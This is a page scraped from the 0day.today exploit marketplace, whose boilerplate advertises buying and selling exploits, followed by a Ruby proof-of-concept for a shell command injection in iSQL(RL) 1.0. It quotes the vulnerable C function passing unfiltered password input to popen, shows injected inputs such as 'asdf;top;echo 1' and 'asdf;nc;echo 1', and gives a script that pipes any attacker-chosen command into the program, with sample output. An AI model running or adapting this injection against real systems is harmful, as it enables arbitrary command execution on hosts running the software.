0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
iSQL 1.0 - Shell Command Injection
[#!/bin/ruby
# Exploit Title: iSQL(RL) 1.0 - Shell Command Injection
# Date: 2016-06-13
# Exploit Author: HaHwul
# Exploit Author Blog: www.hahwul.com
# Vendor Homepage: https://github.com/roselone/iSQL
# Software Link: https://github.com/roselone/iSQL/archive/master.zip
# Version: 1.0
# Tested on: Debian [wheezy]
# CVE : none
=begin
### Vulnerability Point
:: [isql_main.c 455 line] popen(cmd,"r"); code is vulnerable
:: don't filtering special characters in str value
446 char *get_MD5(char *str){
447 FILE *stream;
448 char *buf=malloc(sizeof(char)*33);
449 char cmd[100];
450 memset(buf,'\0',sizeof(buf));
451 memset(cmd,'\0',sizeof(cmd));
452 strcpy(cmd,"echo "); //5
453 strcpy((char *)cmd+5,str);
454 strcpy((char *)cmd+5+strlen(str)," | md5sum");
455 stream=popen(cmd,"r");
456 fread(buf,sizeof(char),32,stream);
457 // printf("%s\n",buf);
458 return buf;
459 }
### Vulnerability Triger
614 while (USER_NUM==-1){
615 printf(">username:");
616 scanf("%s",username);
617 printf(">password:");
618 scanf("%s",passwd);
619 md5=get_MD5(passwd);
### Vulnerability Run
>username:asdf;
>password:asdf;top;echo 1
(~) #> ps -aux | grep top
root 13279 0.0 0.0 4472 860 pts/1 S+ 13:33 0:00 sh -c echo asdf;top;echo | md5sum
root 13280 0.3 0.0 26304 3200 pts/1 S+ 13:33 0:00 top
=end
### Attack command
#> (sleep 5; echo -en 'aasdf\n';sleep 1;echo -en 'asdf;nc;echo 1';sleep 10) | ./isql
### Ruby Code
puts "SQL 1.0 - Shell Command Injection"
puts "by hahwul"
if(ARGV.size != 1)
puts "Usage: ruby iSQL_command_injection.rb [COMMAND]"
puts " need ./isql in same directory"
exit()
else
puts "CMD :: "+ARGV[0]
puts "Run Injection.."
system("(sleep 5; echo -en 'aasdf\n';sleep 1;echo -en 'asdf;#{ARGV[0]};echo 1';sleep 10) | ./isql")
end
### Sample Output
=begin
#> ruby test.rb nc
# Exploit Title: iSQL 1.0 Shell Command Injection
by hahwul
CMD :: nc
Run Injection..
*************** welcome to ISQL ****************
* version 1.0 *
* Designed by RL *
* Copyright (c) 2011, RL. All rights reserved *
************************************************
>username:>password:verify failure , try again !
This is nc from the netcat-openbsd package. An alternative nc is available
in the netcat-traditional package.
usage: nc [-46bCDdhjklnrStUuvZz] [-I length] [-i interval] [-O length]
[-P proxy_username] [-p source_port] [-q seconds] [-s source]
[-T toskeyword] [-V rtable] [-w timeout] [-X proxy_protocol]
[-x proxy_address[:port]] [destination] [port]
>username:>password:verify failure , try again !
^Ctest.rb:10:in `system': Interrupt
from test.rb:10:in `<main>'
=end
# 0day.today [2024-06-30] #